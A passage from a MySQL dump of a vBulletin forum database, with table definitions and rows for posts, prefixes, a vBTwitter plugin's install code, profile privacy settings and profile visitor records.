(470, 2800, 0, 1),
(470, 2801, 0, 1),
(498, 3047, 0, 1),
(502, 3037, 0, 4),
(506, 3037, 0, 1),
(574, 3048, 0, 1),
(577, 3048, 0, 1),
(578, 3048, 0, 1),
(581, 3012, 0, 1),
(599, 3012, 0, 1),
(608, 3012, 0, 1),
(617, 2878, 0, 1),
(617, 3037, 0, 1),
(623, 2702, 0, 1),
(624, 3031, 1, 2),
(635, 2801, 2, 2),
(636, 2801, 2, 2),
(637, 2801, 2, 2),
(638, 2801, 0, 1),
(639, 2801, 0, 1),
(640, 2801, 0, 1),
(641, 2801, 0, 1),
(642, 2801, 0, 1),
(643, 2801, 0, 1),
(644, 2801, 0, 1),
(645, 2801, 0, 1),
(646, 2801, 0, 1),
(647, 2801, 0, 1),
(648, 2801, 0, 1),
(649, 2801, 0, 1),
(650, 2801, 0, 1),
(651, 2801, 0, 1),
(652, 2801, 0, 1),
(653, 2801, 0, 1),
(654, 2801, 0, 1),
(655, 2801, 0, 1),
(656, 2801, 0, 1),
(657, 2801, 0, 1),
(658, 2801, 0, 1),
(659, 2865, 0, 1),
(660, 2865, 0, 1),
(661, 2865, 0, 1),
(662, 2865, 0, 1),
(663, 2800, 2, 2),
(665, 2800, 0, 1),
(667, 3037, 0, 1),
(669, 2994, 0, 1),
(670, 2994, 0, 1),
(670, 3012, 0, 2),
(670, 3026, 0, 1),
(672, 2996, 2, 2),
(673, 2996, 0, 1),
(673, 2999, 0, 1),
(673, 3000, 0, 1),
(673, 3006, 0, 1),
(673, 3043, 0, 1),
(674, 2997, 0, 1),
(675, 2997, 0, 1),
(675, 2998, 0, 1),
(675, 3001, 0, 1),
(675, 3026, 0, 2),
(675, 3032, 0, 1),
(679, 2878, 0, 1),
(680, 3012, 0, 1),
(731, 3048, 0, 1),
(737, 3045, 0, 1),
(810, 2999, 0, 1),
(810, 3000, 0, 1),
(815, 3012, 0, 1),
(815, 3037, 0, 1),
(822, 2999, 0, 1),
(822, 3000, 0, 1),
(864, 3028, 0, 1),
(864, 3032, 0, 1),
(867, 3032, 0, 1),
(901, 3012, 0, 2),
(952, 2878, 2, 2),
(953, 2878, 0, 1),
(983, 3050, 2, 2),
(1009, 2999, 0, 1),
(1009, 3000, 0, 1),
(1010, 3000, 0, 1),
(1011, 3000, 0, 1),
(1013, 2702, 2, 3),
(1013, 3031, 1, 2),
(1013, 3050, 0, 1),
(1038, 3015, 0, 1),
(1049, 3015, 0, 1),
(1055, 3012, 0, 1),
(1066, 3001, 0, 1),
(1067, 3001, 0, 1),
(1068, 3001, 0, 1),
(1068, 3006, 0, 1),
(1069, 3001, 0, 1),
(1085, 3003, 0, 1),
(1091, 3012, 0, 3),
(1123, 3026, 0, 1),
(1127, 3012, 0, 1),
(1147, 3047, 0, 1),
(1153, 3047, 0, 1),
(1154, 3010, 0, 1),
(1154, 3047, 0, 1),
(1155, 3010, 0, 1),
(1156, 3010, 0, 1),
(1157, 3010, 0, 1),
(1158, 3011, 0, 1),
(1159, 3011, 0, 1),
(1160, 3012, 2, 5),
(1161, 3012, 0, 1),
(1161, 3020, 0, 1),
(1161, 3028, 0, 1),
(1162, 3012, 0, 1),
(1163, 3012, 0, 1),
(1164, 3012, 0, 1),
(1165, 3012, 0, 1),
(1166, 3012, 0, 1),
(1167, 3012, 0, 2),
(1168, 3012, 0, 1),
(1169, 3012, 0, 2),
(1170, 3012, 0, 1),
(1171, 3012, 0, 1),
(1172, 3012, 0, 1),
(1173, 3012, 0, 1),
(1174, 3012, 0, 1),
(1175, 3012, 0, 1),
(1176, 3012, 0, 1),
(1177, 3012, 0, 1),
(1178, 3012, 0, 1),
(1179, 3012, 0, 1),
(1180, 3012, 0, 1),
(1181, 3012, 0, 1),
(1182, 3012, 0, 1),
(1183, 3012, 0, 1),
(1184, 3012, 0, 1),
(1185, 3012, 0, 1),
(1186, 3012, 0, 1),
(1187, 3012, 0, 1),
(1188, 3012, 0, 1),
(1212, 3015, 2, 2),
(1213, 3015, 0, 1),
(1214, 3015, 0, 1),
(1215, 3015, 0, 1),
(1216, 3015, 0, 1),
(1217, 3015, 0, 1),
(1231, 3019, 0, 1),
(1232, 3020, 0, 1),
(1232, 3028, 0, 1),
(1233, 3021, 0, 1),
(1234, 3021, 0, 2),
(1235, 3021, 0, 1),
(1236, 3021, 0, 1),
(1241, 2702, 0, 1),
(1275, 3028, 0, 1),
(1275, 3032, 0, 1),
(1278, 3031, 0, 1),
(1295, 3026, 2, 2),
(1296, 3026, 0, 1),
(1297, 3026, 0, 1),
(1298, 3026, 0, 1),
(1299, 3026, 0, 1),
(1300, 3026, 0, 1),
(1301, 3026, 0, 1),
(1302, 3026, 0, 1),
(1303, 3028, 0, 1),
(1303, 3032, 0, 1),
(1320, 3032, 0, 1),
(1321, 3032, 0, 1),
(1322, 3032, 0, 1),
(1323, 3032, 0, 1),
(1324, 3032, 0, 1),
(1325, 3032, 0, 1),
(1326, 3032, 0, 1),
(1327, 3032, 0, 1),
(1328, 3032, 0, 1),
(1329, 3032, 0, 1),
(1354, 3037, 2, 3),
(1355, 3037, 0, 1),
(1356, 3037, 0, 1),
(1357, 3037, 0, 1),
(1358, 3037, 0, 1),
(1359, 3037, 0, 1),
(1360, 3037, 0, 1),
(1361, 3037, 0, 2),
(1362, 3037, 0, 1),
(1363, 3037, 0, 1),
(1364, 3037, 0, 1),
(1365, 3037, 0, 1),
(1366, 3037, 0, 1),
(1367, 3037, 0, 1),
(1368, 3037, 0, 2),
(1369, 3037, 0, 6),
(1370, 3037, 0, 1),
(1371, 3037, 0, 25),
(1372, 3037, 0, 1),
(1373, 3037, 0, 3),
(1374, 3037, 0, 7),
(1375, 3037, 0, 40),
(1376, 3037, 0, 3),
(1377, 3037, 0, 1),
(1378, 3037, 0, 3),
(1379, 3037, 0, 3),
(1380, 3037, 0, 1),
(1381, 3037, 0, 1),
(1382, 3037, 0, 2),
(1383, 3037, 0, 1),
(1384, 3037, 0, 3),
(1385, 3037, 0, 1),
(1386, 3037, 0, 1),
(1387, 3037, 0, 1),
(1388, 3037, 0, 1),
(1389, 3037, 0, 1),
(1390, 3037, 0, 1),
(1391, 3037, 0, 1),
(1392, 3037, 0, 1),
(1393, 3037, 0, 1),
(1394, 3037, 0, 1),
(1395, 3037, 0, 1),
(1396, 3037, 0, 1),
(1397, 3037, 0, 3),
(1398, 3037, 0, 1),
(1399, 3037, 0, 1),
(1400, 3037, 0, 4),
(1401, 3037, 0, 1),
(1402, 3037, 0, 1),
(1403, 3037, 0, 1),
(1404, 3037, 0, 1),
(1405, 3037, 0, 1),
(1406, 3037, 0, 1),
(1407, 3037, 0, 3),
(1408, 3037, 0, 1),
(1409, 3037, 0, 2),
(1410, 3037, 0, 1),
(1411, 3037, 0, 1),
(1412, 3037, 0, 1),
(1413, 3037, 0, 1),
(1414, 3037, 0, 1),
(1415, 3037, 0, 1),
(1416, 3037, 0, 1),
(1417, 3037, 0, 1),
(1418, 3037, 0, 1),
(1419, 3037, 0, 1),
(1420, 3037, 0, 1),
(1421, 3037, 0, 1),
(1422, 3037, 0, 1),
(1423, 3037, 0, 1),
(1424, 3037, 0, 2),
(1425, 3037, 0, 3),
(1426, 3037, 0, 2),
(1427, 3037, 0, 1),
(1428, 3037, 0, 4),
(1429, 3037, 0, 1),
(1430, 3037, 0, 1),
(1431, 3037, 0, 1),
(1432, 3037, 0, 1),
(1433, 3037, 0, 1),
(1434, 3037, 0, 1),
(1435, 3037, 0, 1),
(1436, 3037, 0, 1),
(1437, 3037, 0, 1),
(1438, 3037, 0, 1),
(1439, 3037, 0, 1),
(1440, 3037, 0, 1),
(1441, 3037, 0, 1),
(1442, 3037, 0, 1),
(1443, 3037, 0, 1),
(1444, 3037, 0, 1),
(1445, 3037, 0, 1),
(1471, 3042, 2, 2),
(1472, 3043, 2, 2),
(1474, 3050, 2, 3),
(1475, 3050, 0, 1),
(1476, 3045, 2, 2),
(1477, 3045, 0, 1),
(1478, 3045, 0, 1),
(1479, 3045, 0, 1),
(1480, 3045, 0, 1),
(1481, 3045, 0, 1),
(1482, 3045, 0, 1),
(1483, 3045, 0, 1),
(1484, 3045, 0, 1),
(1484, 3046, 0, 1),
(1485, 3046, 2, 3),
(1486, 3046, 0, 1),
(1487, 3047, 2, 3),
(1488, 3047, 0, 1),
(1489, 3047, 0, 1),
(1490, 3047, 0, 1),
(1491, 3047, 0, 1),
(1492, 3048, 2, 3),
(1492, 3049, 0, 1),
(1493, 3048, 0, 1),
(1494, 3048, 0, 1),
(1495, 3048, 0, 1),
(1496, 3048, 0, 1),
(1497, 3048, 0, 1),
(1498, 3048, 0, 1),
(1499, 3049, 0, 1),
(1500, 3050, 0, 1),
(1501, 3050, 0, 1),
(1502, 3050, 0, 1);
DROP TABLE IF EXISTS `postlog`;
CREATE TABLE `postlog` (
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`useragent` char(100) NOT NULL DEFAULT '',
`ip` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`postid`),
KEY `dateline` (`dateline`),
KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `postparsed`;
CREATE TABLE `postparsed` (
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`languageid` smallint(5) unsigned NOT NULL DEFAULT '0',
`hasimages` smallint(6) NOT NULL DEFAULT '0',
`pagetext_html` mediumtext,
PRIMARY KEY (`postid`,`styleid`,`languageid`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `prefix`;
CREATE TABLE `prefix` (
`prefixid` varchar(25) NOT NULL DEFAULT '',
`prefixsetid` varchar(25) NOT NULL DEFAULT '',
`displayorder` int(10) unsigned NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`prefixid`),
KEY `prefixsetid` (`prefixsetid`,`displayorder`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `prefixpermission`;
CREATE TABLE `prefixpermission` (
`prefixid` varchar(25) NOT NULL DEFAULT '',
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
KEY `prefixsetid` (`prefixid`,`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `prefixset`;
CREATE TABLE `prefixset` (
`prefixsetid` varchar(25) NOT NULL DEFAULT '',
`displayorder` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`prefixsetid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `product`;
CREATE TABLE `product` (
`productid` varchar(25) NOT NULL DEFAULT '',
`title` varchar(50) NOT NULL DEFAULT '',
`description` varchar(250) NOT NULL DEFAULT '',
`version` varchar(25) NOT NULL DEFAULT '',
`active` smallint(5) unsigned NOT NULL DEFAULT '1',
`url` varchar(250) NOT NULL DEFAULT '',
`versioncheckurl` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`productid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `product` (`productid`, `title`, `description`, `version`, `active`, `url`, `versioncheckurl`) VALUES
('kk_vbtwitter', 'vBTwitter', 'This adds integration with Twitter into your vBulletin installation.', '1.0.4', 1, 'http://www.vbulletin.org/forum/showthread.php?t=204694', 'http://www.vbulletin.org/forum/misc.php?do=productcheck&pid=kk_vbtwitter');
DROP TABLE IF EXISTS `productcode`;
CREATE TABLE `productcode` (
`productcodeid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`productid` varchar(25) NOT NULL DEFAULT '',
`version` varchar(25) NOT NULL DEFAULT '',
`installcode` mediumtext,
`uninstallcode` mediumtext,
PRIMARY KEY (`productcodeid`),
KEY `productid` (`productid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `productcode` (`productcodeid`, `productid`, `version`, `installcode`, `uninstallcode`) VALUES
(1, 'kk_vbtwitter', '1.0.0', '$vbulletin->db->query(\"ALTER TABLE `\" . TABLE_PREFIX . \"user` ADD (`twitter_username` VARCHAR( 255 ) NOT NULL ,`twitter_password` VARCHAR( 255 ) NOT NULL)\");', '// Previously Dropped'),
(2, 'kk_vbtwitter', '1.0.1', '$vbulletin->db->query(\"ALTER TABLE `\" . TABLE_PREFIX . \"user` ADD (`twitter_size` VARCHAR( 255 ) NOT NULL)\");\r\n\r\n// Not Needed', '// Previously Dropped'),
(3, 'kk_vbtwitter', '1.0.4', '$vbulletin->db->query(\"ALTER TABLE `\" . TABLE_PREFIX . \"user` ADD (`oauth_token` VARCHAR( 255 ) NOT NULL ,`oauth_token_secret` VARCHAR( 255 ) NOT NULL)\");', '$vbulletin->db->query(\"ALTER TABLE `\" . TABLE_PREFIX . \"user` DROP COLUMN `oauth_token`, DROP COLUMN `oauth_token_secret`\");'),
(4, 'kk_vbtwitter', '1.0.4', '$vbulletin->db->query(\"ALTER TABLE `\" . TABLE_PREFIX . \"user` DROP COLUMN `twitter_size`, DROP COLUMN `twitter_password`, DROP COLUMN `twitter_username`\");', '// Just Dropping Stuff... :)');
DROP TABLE IF EXISTS `productdependency`;
CREATE TABLE `productdependency` (
`productdependencyid` int(11) NOT NULL AUTO_INCREMENT,
`productid` varchar(25) NOT NULL DEFAULT '',
`dependencytype` varchar(25) NOT NULL DEFAULT '',
`parentproductid` varchar(25) NOT NULL DEFAULT '',
`minversion` varchar(50) NOT NULL DEFAULT '',
`maxversion` varchar(50) NOT NULL DEFAULT '',
PRIMARY KEY (`productdependencyid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `profileblockprivacy`;
CREATE TABLE `profileblockprivacy` (
`userid` int(10) unsigned NOT NULL,
`blockid` varchar(255) NOT NULL,
`requirement` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`blockid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `profileblockprivacy` (`userid`, `blockid`, `requirement`) VALUES
(1, 'aboutme', 3),
(1, 'albums', 3),
(1, 'contactinfo', 3),
(1, 'friends', 3),
(1, 'groups', 3),
(1, 'profile_picture', 3),
(1, 'visitors', 3),
(1, 'visitor_messaging', 3),
(166, 'aboutme', 1),
(166, 'albums', 1),
(166, 'contactinfo', 1),
(166, 'friends', 1),
(166, 'groups', 1),
(166, 'profile_picture', 1),
(166, 'visitors', 1),
(166, 'visitor_messaging', 1),
(173, 'aboutme', 3),
(173, 'albums', 3),
(173, 'contactinfo', 3),
(173, 'friends', 3),
(173, 'groups', 3),
(173, 'profile_picture', 2),
(173, 'visitors', 3),
(173, 'visitor_messaging', 3),
(242, 'aboutme', 3),
(242, 'albums', 3),
(242, 'contactinfo', 3),
(242, 'friends', 3),
(242, 'groups', 3),
(242, 'profile_picture', 3),
(242, 'visitors', 3),
(242, 'visitor_messaging', 3),
(281, 'aboutme', 3),
(281, 'albums', 3),
(281, 'contactinfo', 3),
(281, 'friends', 3),
(281, 'groups', 3),
(281, 'profile_picture', 3),
(281, 'visitors', 3),
(281, 'visitor_messaging', 3),
(289, 'aboutme', 1),
(289, 'albums', 1),
(289, 'contactinfo', 1),
(289, 'friends', 1),
(289, 'groups', 1),
(289, 'profile_picture', 1),
(289, 'visitors', 1),
(289, 'visitor_messaging', 1),
(383, 'aboutme', 0),
(383, 'albums', 0),
(383, 'contactinfo', 3),
(383, 'friends', 3),
(383, 'groups', 0),
(383, 'profile_picture', 0),
(383, 'visitors', 3),
(383, 'visitor_messaging', 0);
DROP TABLE IF EXISTS `profilefield`;
CREATE TABLE `profilefield` (
`profilefieldid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`profilefieldcategoryid` smallint(5) unsigned NOT NULL DEFAULT '0',
`required` smallint(6) NOT NULL DEFAULT '0',
`hidden` smallint(6) NOT NULL DEFAULT '0',
`maxlength` smallint(6) NOT NULL DEFAULT '250',
`size` smallint(6) NOT NULL DEFAULT '25',
`displayorder` smallint(6) NOT NULL DEFAULT '0',
`editable` smallint(6) NOT NULL DEFAULT '1',
`type` enum('input','select','radio','textarea','checkbox','select_multiple') NOT NULL DEFAULT 'input',
`data` mediumtext,
`height` smallint(6) NOT NULL DEFAULT '0',
`def` smallint(6) NOT NULL DEFAULT '0',
`optional` smallint(5) unsigned NOT NULL DEFAULT '0',
`searchable` smallint(6) NOT NULL DEFAULT '0',
`memberlist` smallint(6) NOT NULL DEFAULT '0',
`regex` varchar(255) NOT NULL DEFAULT '',
`form` smallint(6) NOT NULL DEFAULT '0',
`html` smallint(6) NOT NULL DEFAULT '0',
`perline` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`profilefieldid`),
KEY `editable` (`editable`),
KEY `profilefieldcategoryid` (`profilefieldcategoryid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `profilefield` (`profilefieldid`, `profilefieldcategoryid`, `required`, `hidden`, `maxlength`, `size`, `displayorder`, `editable`, `type`, `data`, `height`, `def`, `optional`, `searchable`, `memberlist`, `regex`, `form`, `html`, `perline`) VALUES
(1, 0, 0, 0, 100, 25, 1, 1, 'input', '', 0, 0, 0, 1, 1, '', 0, 0, 0),
(2, 0, 0, 0, 100, 25, 2, 1, 'input', '', 0, 0, 0, 1, 1, '', 0, 0, 0),
(3, 0, 0, 0, 100, 25, 3, 1, 'input', '', 0, 0, 0, 1, 1, '', 0, 0, 0),
(4, 0, 0, 0, 100, 25, 4, 1, 'input', '', 0, 0, 0, 1, 1, '', 0, 0, 0);
DROP TABLE IF EXISTS `profilefieldcategory`;
CREATE TABLE `profilefieldcategory` (
`profilefieldcategoryid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`displayorder` smallint(6) NOT NULL DEFAULT '0',
`location` varchar(25) NOT NULL DEFAULT '',
`allowprivacy` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`profilefieldcategoryid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `profilevisitor`;
CREATE TABLE `profilevisitor` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`visitorid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`visible` int(10) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`visitorid`,`userid`),
KEY `userid` (`userid`,`visible`,`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `profilevisitor` (`userid`, `visitorid`, `dateline`, `visible`) VALUES
(1, 173, 1458769451, 0),
(1, 277, 1446720003, 1),
(1, 283, 1446777087, 1),
(1, 287, 1447203797, 1),
(1, 33, 1447373413, 1),
(1, 295, 1447540133, 1),
(1, 302, 1447817425, 1),
(1, 305, 1447958593, 1),
(1, 323, 1449077978, 1),
(1, 289, 1449079365, 1),
(1, 100, 1450083047, 1),
(1, 177, 1455728294, 1),
(2, 173, 1439830322, 0),
(2, 1, 1420926292, 1),
(2, 101, 1429690740, 1),
(2, 45, 1434114458, 1),
(2, 33, 1436112373, 1),
(2, 170, 1439152511, 1),
(2, 133, 1440781211, 1),
(2, 39, 1440912343, 1),
(2, 177, 1442780791, 1),
(2, 100, 1450083050, 1),
(2, 135, 1460291230, 1),
(3, 1, 1420559081, 1),
(3, 39, 1425969833, 1),
(3, 159, 1427461073, 1),
(3, 165, 1436407316, 1),
(3, 135, 1460291237, 1),
(6, 33, 1421170056, 1),
(6, 277, 1446719982, 1),
(7, 101, 1420483935, 1),
(8, 9, 1420448202, 0),
(9, 39, 1426417297, 1),
(9, 277, 1446719945, 1),
(10, 1, 1420474570, 1),
(10, 181, 1445399610, 1),
(10, 277, 1446719859, 1),
(10, 315, 1448648792, 1),
(11, 1, 1421157357, 1),
(11, 33, 1421170063, 1),
(11, 29, 1422144580, 1),
(11, 40, 1425995855, 1),
(11, 160, 1427118633, 1),
(11, 100, 1427708829, 1),
(11, 162, 1427829990, 1),
(11, 277, 1446719986, 1),
(11, 383, 1454552791, 1),
(11, 270, 1456733268, 1),
(13, 9, 1420482076, 0),
(13, 170, 1444498151, 0),
(13, 173, 1457821956, 0),
(13, 29, 1422144631, 1),
(13, 39, 1425968931, 1),
(13, 120, 1427447553, 1),
(13, 135, 1428483951, 1),
(13, 277, 1446719902, 1),
(13, 308, 1451365703, 1),
(13, 178, 1454307097, 1),
(13, 100, 1456182581, 1),
(13, 1, 1456826535, 1),
(13, 287, 1457582621, 1),
(18, 173, 1458765366, 0),
(19, 170, 1439162070, 1),
(22, 277, 1446719634, 1),
(24, 277, 1446719376, 1),
(25, 277, 1446719621, 1),
(25, 24, 1454284754, 1),
(29, 1, 1422122630, 1),
(29, 167, 1437424286, 1),
(29, 13, 1442777549, 1),
(29, 100, 1449765003, 1),
(30, 170, 1439162023, 1),
(30, 277, 1446719959, 1),
(33, 173, 1449943129, 0),
(33, 170, 1439152816, 1),
(33, 172, 1440882616, 1),
(33, 1, 1443704408, 1),
(33, 161, 1444308439, 1),
(33, 272, 1446523005, 1),
(33, 277, 1446720071, 1),
(33, 289, 1447280678, 1),
(33, 341, 1450608586, 1),
(33, 100, 1452379593, 1),
(33, 382, 1453206654, 1),
(33, 135, 1460245338, 1),
(39, 100, 1428036747, 1),
(39, 33, 1443365523, 1),
(39, 277, 1446719949, 1),
(40, 159, 1427113109, 1),
(40, 127, 1428493184, 1),
(40, 277, 1446720012, 1),
(41, 171, 1442935561, 1),
(41, 277, 1446720032, 1),
(41, 100, 1449041558, 1),
(44, 1, 1425669751, 1),
(44, 100, 1440005006, 1),
(44, 187, 1443720074, 1),
(44, 277, 1446719578, 1),
(45, 1, 1421184149, 1),
(45, 277, 1446719910, 1),
(45, 100, 1456528696, 1),
(49, 165, 1436407330, 1),
(50, 170, 1439152733, 1),
(50, 277, 1446719970, 1),
(50, 24, 1454285183, 1),
(52, 277, 1446719460, 1),
(52, 24, 1454285280, 1),
(100, 173, 1458769983, 0),
(100, 306, 1450463605, 1),
(100, 240, 1452019484, 1),
(100, 356, 1452183817, 1),
(100, 196, 1453706105, 1),
(100, 274, 1454501677, 1),
(100, 383, 1454764767, 1),
(100, 13, 1455324287, 1),
(100, 178, 1456914145, 1),
(100, 304, 1458023263, 1),
(100, 193, 1458084220, 1),
(100, 254, 1458668826, 1),
(101, 1, 1420397046, 1),
(102, 170, 1439405654, 0),
(102, 1, 1421767852, 1),
(102, 100, 1435810627, 1),
(104, 1, 1420481114, 1),
(104, 45, 1421084987, 1),
(110, 104, 1420480154, 1),
(115, 33, 1421012652, 1),
(117, 102, 1420493711, 1),
(119, 277, 1446719761, 1),
(126, 143, 1421681423, 1),
(127, 172, 1440882687, 1),
(130, 45, 1421233968, 1),
(131, 1, 1420922208, 1),
(132, 1, 1421142106, 1),
(133, 33, 1421182987, 1),
(133, 1, 1421184146, 1),
(133, 306, 1450564619, 1),
(133, 13, 1454978742, 1),
(133, 100, 1463930333, 1),
(134, 33, 1421171032, 1),
(135, 33, 1421169964, 1),
(135, 13, 1455324048, 1),
(135, 136, 1464043325, 1),
(137, 143, 1421681129, 1),
(148, 40, 1425995855, 1),
(154, 170, 1439152568, 1),
(157, 1, 1422004108, 1),
(158, 39, 1426417228, 1),
(158, 133, 1426551365, 1),
(159, 127, 1428491503, 1),
(160, 161, 1428396107, 1),
(160, 127, 1435620832, 1),
(160, 170, 1439253451, 1),
(161, 173, 1464476558, 0),
(161, 162, 1427977994, 1),
(161, 127, 1428491511, 1),
(161, 100, 1451486384, 1),
(162, 127, 1428491514, 1),
(162, 100, 1428976607, 1),
(162, 161, 1429167790, 1),
(162, 45, 1434114444, 1),
(163, 170, 1443050744, 0),
(164, 100, 1435594356, 1),
(164, 127, 1435620829, 1),
(164, 169, 1441187571, 1),
(164, 175, 1441188623, 1),
(164, 277, 1446719880, 1),
(165, 33, 1436112739, 1),
(165, 170, 1439152677, 1),
(165, 1, 1442588310, 1),
(165, 277, 1446719890, 1),
(165, 13, 1455814816, 1),
(165, 135, 1460291252, 1),
(165, 100, 1461948803, 1),
(166, 100, 1435788530, 1),
(166, 169, 1439551436, 1),
(169, 173, 1457985941, 0),
(169, 170, 1439204455, 1),
(169, 100, 1446812279, 1),
(169, 308, 1455601263, 1),
(169, 246, 1456064820, 1),
(169, 135, 1460242519, 1),
(169, 387, 1463759952, 1),
(170, 173, 1458760289, 0),
(170, 100, 1439791586, 1),
(170, 163, 1443045671, 1),
(170, 277, 1446719406, 1),
(170, 287, 1447395277, 1),
(170, 305, 1447960040, 1),
(170, 13, 1455965966, 1),
(171, 170, 1442269786, 0),
(171, 173, 1457986019, 0),
(171, 172, 1440333479, 1),
(171, 41, 1442934514, 1),
(171, 254, 1446303746, 1),
(171, 277, 1446720105, 1),
(171, 178, 1448270898, 1),
(171, 33, 1449269504, 1),
(171, 306, 1450246817, 1),
(171, 348, 1451395211, 1),
(171, 13, 1454887420, 1),
(171, 100, 1456064941, 1),
(172, 170, 1443555616, 0),
(172, 173, 1464476469, 0),
(172, 171, 1439294791, 1),
(172, 127, 1440101751, 1),
(172, 277, 1446719809, 1),
(172, 291, 1447333497, 1),
(172, 100, 1456057554, 1),
(172, 196, 1464797815, 1),
(173, 170, 1439823896, 0),
(173, 13, 1454897187, 1),
(173, 18, 1456084437, 1),
(173, 383, 1458769178, 1),
(173, 100, 1463696144, 1),
(174, 170, 1440422759, 0),
(177, 188, 1447770123, 1),
(177, 100, 1450083066, 1),
(178, 173, 1458760582, 0),
(178, 100, 1445772889, 1),
(178, 101, 1446120049, 1),
(178, 277, 1446719740, 1),
(178, 297, 1447684082, 1),
(178, 13, 1454901178, 1),
(178, 1, 1456829883, 1),
(178, 287, 1458162121, 1),
(182, 100, 1442830582, 1),
(182, 383, 1455319035, 1),
(184, 100, 1442895995, 1),
(185, 170, 1443029892, 0),
(185, 163, 1443035804, 1),
(187, 172, 1443703094, 1),
(189, 173, 1445810377, 0),
(190, 100, 1446200085, 1),
(192, 100, 1446217522, 1),
(193, 100, 1456131004, 1),
(196, 173, 1458760581, 0),
(196, 100, 1452181785, 1),
(196, 295, 1465049413, 1),
(198, 100, 1446219649, 1),
(211, 277, 1446719805, 1),
(211, 100, 1456069740, 1),
(222, 100, 1456062588, 1),
(236, 234, 1446277088, 1),
(266, 277, 1446719734, 1),
(270, 33, 1450207061, 1),
(271, 170, 1446494682, 0),
(272, 33, 1449680465, 1),
(277, 173, 1450910711, 0),
(277, 169, 1446812249, 1),
(277, 100, 1446812286, 1),
(278, 306, 1449846958, 1),
(283, 383, 1458769803, 1),
(284, 270, 1447162574, 1),
(284, 13, 1454685185, 1),
(285, 178, 1447233550, 1),
(286, 289, 1447265623, 1),
(287, 173, 1458765209, 0),
(287, 100, 1447236713, 1),
(287, 283, 1460554557, 1),
(289, 287, 1447263701, 1),
(289, 100, 1447752211, 1),
(289, 33, 1449269463, 1),
(291, 287, 1447373518, 1),
(291, 323, 1449077797, 1),
(294, 188, 1447769463, 1),
(295, 100, 1456073792, 1),
(295, 287, 1458162297, 1),
(299, 100, 1447755028, 1),
(304, 173, 1458765285, 0),
(305, 173, 1449943219, 0),
(305, 100, 1450082884, 1),
(306, 305, 1447974400, 1),
(306, 100, 1450082879, 1),
(322, 387, 1463695393, 1),
(324, 306, 1449301370, 1),
(328, 33, 1449512672, 1),
(330, 100, 1450083045, 1),
(331, 100, 1450083041, 1),
(333, 100, 1450083038, 1),
(334, 305, 1449766355, 1),
(334, 100, 1450083035, 1),
(335, 100, 1450083033, 1),
(336, 100, 1450083029, 1),
(337, 100, 1450083022, 1),
(340, 100, 1450534099, 1),
(343, 306, 1451072436, 1),
(343, 135, 1460293628, 1),
(343, 283, 1460346211, 1),
(344, 13, 1454899967, 1),
(356, 173, 1458760571, 0),
(360, 308, 1451365654, 1),
(366, 100, 1451751219, 1),
(382, 100, 1453754008, 1),
(383, 173, 1460403301, 0),
(383, 13, 1455324278, 1),
(383, 100, 1456594932, 1),
(383, 1, 1456756011, 1),
(384, 100, 1456223440, 1),
(384, 169, 1456242925, 1),
(384, 10, 1456596537, 1),
(385, 1, 1456762446, 1),
(385, 100, 1456807719, 1),
(386, 169, 1459865165, 1),
(386, 135, 1463910062, 1),
(387, 173, 1465145417, 0),
(387, 100, 1463695508, 1),
(387, 135, 1463910023, 1),
(387, 161, 1463993789, 1),
(387, 1, 1464173517, 1),
(387, 382, 1464555486, 1),
(388, 295, 1463940548, 1);
DROP TABLE IF EXISTS `ranks`;
CREATE TABLE `ranks` (
`rankid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`minposts` int(10) unsigned NOT NULL DEFAULT '0',
`ranklevel` smallint(5) unsigned NOT NULL DEFAULT '0',
`rankimg` mediumtext,
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`type` smallint(5) unsigned NOT NULL DEFAULT '0',
`stack` smallint(5) unsigned NOT NULL DEFAULT '0',
`display` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`rankid`),
KEY `grouprank` (`usergroupid`,`minposts`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `reminder`;
CREATE TABLE `reminder` (
`reminderid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`title` varchar(50) NOT NULL DEFAULT '',
`text` mediumtext,
`duedate` int(10) unsigned NOT NULL DEFAULT '0',
`adminonly` smallint(5) unsigned NOT NULL DEFAULT '1',
